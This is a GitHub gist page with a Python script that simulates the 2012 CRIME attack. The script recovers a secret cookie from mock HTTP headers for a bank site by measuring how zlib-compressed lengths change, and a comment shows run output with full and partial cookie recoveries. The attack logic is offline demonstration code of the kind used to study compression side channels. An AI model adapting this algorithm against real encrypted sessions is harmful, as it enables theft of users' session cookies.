Skip to content

Instantly share code, notes, and snippets.

@stamparm
Forked from koto/crime.py
Created September 11, 2012 13:19
Show Gist options
  • Save stamparm/3698401 to your computer and use it in GitHub Desktop.
Save stamparm/3698401 to your computer and use it in GitHub Desktop.
It's not a crime to build a CRIME
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/
import string
import zlib
import sys
import random
charset = string.letters + string.digits + "%/+="
COOKIE = ''.join(random.choice(charset) for x in range(30))
HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=" + COOKIE + "\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
BODY = ("\r\nCookie: secret="
)
BODY_SUFFIX=("\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
cookie = ""
def compress(data):
c = zlib.compressobj()
return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def findnext(b,bs,charset):
original_length = len(compress(HEADERS + b + bs))
lengths = []
for c in charset:
length = len(compress(HEADERS +
b +
c +
bs))
lengths.append((c, length))
min_length = min(_[1] for _ in lengths)
possible_chars = [_[0] for _ in filter(lambda _: _[1] == min_length, lengths)]
return possible_chars
def exit():
print "Original cookie: %s" % COOKIE
print "Leaked cookie : %s" % cookie
sys.exit(1)
def forward():
global cookie
while len(cookie) < len(COOKIE):
chop = 1
possible_chars = findnext(BODY + cookie, "", charset)
body_tmp = BODY
orig = possible_chars
while not len(possible_chars) == 1:
if len(body_tmp) < chop:
#print "stuck at", possible_chars
return False
body_tmp = body_tmp[chop:]
possible_chars = findnext(body_tmp + cookie, "", orig)
cookie = cookie + possible_chars[0]
return True
while BODY.find("\r\n") >= 0:
if not forward():
cookie = cookie[:-1]
if len(cookie) >= len(COOKIE):
exit()
print "reducing body"
BODY = BODY[BODY.find("\r\n") + 2:]
exit()
@koto
Copy link

koto commented Sep 11, 2012

That's how I started, but I had mixed results with the body shortened, same with your script:

kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
Leaked cookie : i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: QoOQUSX6Tww9Cl8YMGr9MdYxy3kpVZ
Leaked cookie : Qo
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
Leaked cookie : G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: txA7GVLs2UXSP1B8KL2uibAgXXGE%k
Leaked cookie : txA7GVLs2UXSP1B8KL2uibAgXXGE%k
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: ipypF02hb1t7//G0Yx099mUNKU/Bx6
Leaked cookie : i4ee
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: eD2Mxfol4X1jddetaFn9QQvRXCE89A
Leaked cookie : eD2N

with longer body it practically detects the whole cookie everytime.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment